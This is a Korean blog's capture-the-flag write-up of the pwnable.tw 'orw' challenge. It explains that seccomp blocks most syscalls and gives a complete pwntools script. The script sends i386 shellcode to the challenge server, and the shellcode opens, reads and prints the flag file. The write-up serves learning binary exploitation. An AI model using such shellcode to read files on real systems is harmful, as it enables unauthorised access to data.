Recent Posts
Recent Comments
Link
«   2025/05   »
1 2 3
4 5 6 7 8 9 10
11 12 13 14 15 16 17
18 19 20 21 22 23 24
25 26 27 28 29 30 31
Tags
more
Archives
Today
Total
관리 메뉴

CIDY

[Pwnable.tw] orw(Write-up) 본문

Hack/Pwnable

[Pwnable.tw] orw(Write-up)

CIDY 2022. 12. 31. 18:01

path

이름값하는 문제인듯.

?

일단 보호를 끄고 다운받았다. backdoor... 일단 문제를 풀어야 하니 풀고 나서 생각해야겠다.

 

mitigation

쉘코드 바로 실행시켜주는데 seccomp걸려있다.

 

모르겠다 그냥 대충 execve나 그런거 걸러주는거겠지 alphanumeric조건이나 뭐 다른 이상한 건 안 보이니 그냥 문제에서 제시한대로 orw하면 될듯.

 

ㅇㅎ 그러니까 32비트도 syscall인자는 stack이 아니라 레지스터였던거구나. start문제에서의 의문점이 해결되었다.

 

from pwn import *

context.arch = 'i386'

p = remote("chall.pwnable.tw", 10001)
#p = process("./orw")



sc = asm("""
    push 0x00006761
    push 0x6c662f77
    push 0x726f2f65
    push 0x6d6f682f
    mov eax, 0x5
    mov ebx, esp
    int 0x80

    mov ebx, eax
    sub esp, 0x50
    mov ecx,esp
    mov edx, 0x100
    mov eax, 0x3
    int 0x80

    mov ebx, 0x1
    mov eax, 0x4
    int 0x80
 	""")

p.sendafter(b"Give my your shellcode:", sc)

p.interactive()

간단한 쉘코딩이었다.

 

flag

'Hack > Pwnable' 카테고리의 다른 글

[Pwnable.tw] hacknote(Write-up)  (0) 2023.01.01
[Pwnable.tw] dubblesort(Write-up)  (0) 2023.01.01
[Pwnable.tw] start(Write-up)  (0) 2022.12.31
참고할 것들(링크)  (0) 2022.12.26
[Pwnable.tw] BabyStack 문제풀이  (1) 2022.12.24